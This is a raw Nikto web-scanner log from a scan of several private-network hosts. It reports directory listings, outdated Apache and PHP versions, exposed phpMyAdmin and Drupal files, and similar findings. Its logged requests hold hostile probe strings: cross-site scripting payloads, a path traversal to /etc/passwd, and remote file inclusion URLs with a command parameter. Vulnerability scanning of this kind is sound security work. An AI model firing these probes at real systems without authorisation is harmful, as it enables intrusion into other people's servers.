Oct 26, 2019, 08:02 PM
- Nikto v2.1.5/2.1.5
+ Target Host: 192.168.1.12
+ Target Port: 80
+ GET /: The anti-clickjacking X-Frame-Options header is not present.
+ -3268: GET /: /: Directory indexing found.
+ HEAD /: Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ OPTIONS /: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ -3268: GET /./: /./: Directory indexing found.
+ -3268: GET /?mod=node&nid=some_thing&op=view: /?mod=node&nid=some_thing&op=view: Directory indexing found.
+ -3268: GET /?mod=some_thing&op=browse: /?mod=some_thing&op=browse: Directory indexing found.
+ GET /./: /./: Appending '/./' to a directory allows indexing
+ -3268: GET //: //: Directory indexing found.
+ GET //: //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ -3268: GET /?Open: /?Open: Directory indexing found.
+ -3268: GET /?OpenServer: /?OpenServer: Directory indexing found.
+ -3268: GET /%2e/: /%2e/: Directory indexing found.
+ -576: GET /%2e/: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.
+ -3268: GET /?mod=<script>alert(document.cookie)</script>&op=browse: /?mod=<script>alert(document.cookie)</script>&op=browse: Directory indexing found.
+ -3268: GET /?sql_debug=1: /?sql_debug=1: Directory indexing found.
+ -3268: GET ///: ///: Directory indexing found.
+ -3268: GET /?PageServices: /?PageServices: Directory indexing found.
+ -119: GET /?PageServices: /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.
+ -3268: GET /?wp-cs-dump: /?wp-cs-dump: Directory indexing found.
+ -119: GET /?wp-cs-dump: /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.
+ GET /phpmyadmin/changelog.php: Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.30
+ -3092: GET /phpmyadmin/changelog.php: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ -3268: GET /icons/: /icons/: Directory indexing found.
+ -3268: GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
+ -3288: GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when /'s are requested.
+ -3268: GET /?pattern=/etc/*&sort=name: /?pattern=/etc/*&sort=name: Directory indexing found.
+ GET /phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd%00: Cookie phpMyAdmin created without the httponly flag
+ -3268: GET /?D=A: /?D=A: Directory indexing found.
+ -3268: GET /?N=D: /?N=D: Directory indexing found.
+ -3268: GET /?S=A: /?S=A: Directory indexing found.
+ -3268: GET /?M=A: /?M=A: Directory indexing found.
+ -3268: GET /?\"><script>alert('Vulnerable');</script>: /?\"><script>alert('Vulnerable');</script>: Directory indexing found.
+ GET /icons/README: Server leaks inodes via ETags, header found with file /icons/README, inode: 168516, size: 5108, mtime: 0x438c0358aae80
+ -3233: GET /icons/README: /icons/README: Apache default file found.
+ -3268: GET /?_CONFIG[files][functions_page]=http://cirt.net/rfiinc.txt?: /?_CONFIG[files][functions_page]=http://cirt.net/rfiinc.txt?: Directory indexing found.
+ -3268: GET /?npage=-1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: /?npage=-1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: Directory indexing found.
+ -3268: GET /?npage=1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: /?npage=1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: Directory indexing found.
+ -3268: GET /?show=http://cirt.net/rfiinc.txt??: /?show=http://cirt.net/rfiinc.txt??: Directory indexing found.
+ GET /wordpress/: Uncommon header 'x-pingback' found, with contents: http://192.168.1.12/wordpress/xmlrpc.php
+ GET /wordpress/: /wordpress/: A Wordpress installation was found.
+ GET /phpmyadmin/: /phpmyadmin/: phpMyAdmin directory found
+ -3268: GET /?-s: /?-s: Directory indexing found.
+ Target Host: 192.168.1.17
+ Target Port: 80
+ GET /: Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.29
+ GET /: Cookie DOLSESSID_f5a888b167fcc4b13065db5ce7608989 created without the httponly flag
+ GET //public/agenda/agendaexport.php: File/dir '/public/agenda/agendaexport.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //public/demo/: File/dir '/public/demo/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //index.php: File/dir '/index.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //: File/dir '/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET /robots.txt: "robots.txt" contains 4 entries which should be manually viewed.
+ -3092: GET /admin/: /admin/: This might be interesting...
+ -3092: GET /ftp/: /ftp/: This might be interesting...
+ -3092: GET /includes/: /includes/: This might be interesting...
+ -3092: GET /public/: /public/: This might be interesting...
+ -3092: GET /support/: /support/: This might be interesting...
+ -3092: GET /user/: /user/: This might be interesting...
+ -3093: GET /admin/index.php: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ Target Host: 192.168.1.13
+ Target Port: 80
+ GET /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
+ GET /: Cookie session created without the httponly flag
+ GET /: Cookie feindura_checkCookies created without the httponly flag
+ DEBUG HASH(0x55e142a6cac8): DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ -12184: GET /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ -3268: GET /style/: /style/: Directory indexing found.
+ -3233: GET /icons/README: /icons/README: Apache default file found.
+ Target Host: 192.168.1.14
+ Target Port: 80
+ GET /: Retrieved x-powered-by header: PHP/7.2.22
+ -877: TRACE /: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ -3268: GET /img/: /img/: Directory indexing found.
+ -3092: GET /img/: /img/: This might be interesting...
+ -3268: GET /icons/: /icons/: Directory indexing found.
+ -3233: GET /icons/README: /icons/README: Apache default file found.
+ Target Host: 192.168.1.15
+ Target Port: 80
+ OPTIONS /: Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE
+ -877: TRACE /: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ GET /support/: Retrieved x-powered-by header: PHP/5.4.16
+ GET /support/: Cookie OSTSESSID created without the httponly flag
+ -3092: GET /support/: /support/: This might be interesting...
+ -3268: GET /icons/: /icons/: Directory indexing found.
+ -3233: GET /icons/README: /icons/README: Apache default file found.
+ Target Host: 192.168.1.11
+ Target Port: 80
+ GET /: Uncommon header 'x-content-type-options' found, with contents: nosniff
+ GET /: Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ GET /: Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ -3268: GET /includes/: /includes/: Directory indexing found.
+ GET //includes/: File/dir '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ -3268: GET /misc/: /misc/: Directory indexing found.
+ GET //misc/: File/dir '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ -3268: GET /modules/: /modules/: Directory indexing found.
+ GET //modules/: File/dir '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ -3268: GET /profiles/: /profiles/: Directory indexing found.
+ GET //profiles/: File/dir '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ -3268: GET /scripts/: /scripts/: Directory indexing found.
+ GET //scripts/: File/dir '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ -3268: GET /themes/: /themes/: Directory indexing found.
+ GET //themes/: File/dir '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET /cron.php: Uncommon header 'link' found, with contents: </?q=403-error>; rel="canonical",</?q=node/9>; rel="shortlink"
+ GET //INSTALL.mysql.txt: File/dir '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //INSTALL.pgsql.txt: File/dir '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //INSTALL.sqlite.txt: File/dir '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //install.php: File/dir '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //LICENSE.txt: File/dir '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //MAINTAINERS.txt: File/dir '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET /update.php: Cookie SESSba753efa2015157bd094d405599223a5 created without the httponly flag
+ GET //UPGRADE.txt: File/dir '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //xmlrpc.php: File/dir '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //?q=filter/tips/: File/dir '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //?q=user/password/: File/dir '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //?q=user/register/: File/dir '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET //?q=user/login/: File/dir '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET /robots.txt: "robots.txt" contains 68 entries which should be manually viewed.
+ DEBUG HASH(0x55e142a6aa78): DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ -3092: GET /web.config: /web.config: ASP config file is accessible.
+ -3092: GET /includes/: /includes/: This might be interesting...
+ -3092: GET /misc/: /misc/: This might be interesting...
+ -3092: GET /UPGRADE.txt: /UPGRADE.txt: Default file found.
+ -3092: GET /install.php: /install.php: Drupal install.php file found.
+ -3092: GET /install.php: /install.php: install.php file found.
+ -3092: GET /LICENSE.txt: /LICENSE.txt: License file found may identify site software.
+ -3092: GET /xmlrpc.php: /xmlrpc.php: xmlrpc.php was found.
+ -3233: GET /INSTALL.mysql.txt: /INSTALL.mysql.txt: Drupal installation file found.
+ -3233: GET /INSTALL.pgsql.txt: /INSTALL.pgsql.txt: Drupal installation file found.
+ -3233: GET /icons/README: /icons/README: Apache default file found.
+ -3268: GET /sites/: /sites/: Directory indexing found.
+ Target Host: _gateway
+ Target Port: 80
+ GET /: Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN